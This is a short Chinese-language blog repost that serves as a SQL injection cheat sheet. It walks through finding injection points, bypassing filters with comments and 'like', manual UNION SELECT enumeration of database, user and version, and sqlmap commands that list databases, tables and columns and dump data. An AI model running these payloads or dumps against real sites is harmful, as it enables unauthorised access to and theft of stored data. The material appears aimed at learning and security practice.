标签：sqlmap 编码 url py python sql id 注入

一、步骤

• 判断是否存在注入，注入是字符型还是数字型
• 猜解sql查询语句中的字段数
• 确定显示的字段顺序
• 获取当前数据库
• 获取数据库中的表
• 获取表中的字段名
• 下载数据
• 工具：sqlmap

  二、寻找注入点

• 输入的字段作为string，用单引号或双引号来判断
• ’
• 输入的字段作为数值型，此时没有字段两边引号，也适用于没有错误回显（盲注）
• id=1 and 1=1和id=1 and 1=2
• id=1 or 1
• id=-1

  三、过滤

• 空格被过滤，可以用/**/（注释）替换 
• =被过滤，可以用like替换

  四、手工注入

• 判断字段数： order by 数字
• 判断回显位置：union select 1,2,3,4...
• 判断数据库信息：union select database(),user(),version(),...

  五、编码

• url编码
• md5编码
• base64编码

  六、sqlmap    

• python sqlmap.py -u "url"                        //查询是否存在注入点
• python sqlmap.py -u "url" --tamper "base64encode.py"        //使用base64编码
• python sqlmap.py -u "url"  --dbs            //查询数据库
• python sqlmap.py -u "url" -D dbname --tables         //查询表
• python sqlmap.py -u "url" -D dbname --tables --columns   //查询字段名
• python sqlmap.py -u "url" --dump -T tablename -C "字段名"     //获取字段的值

标签：sqlmap,编码,url,py,python,sql,id,注入
来源： https://www.cnblogs.com/ruowei/p/10852200.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。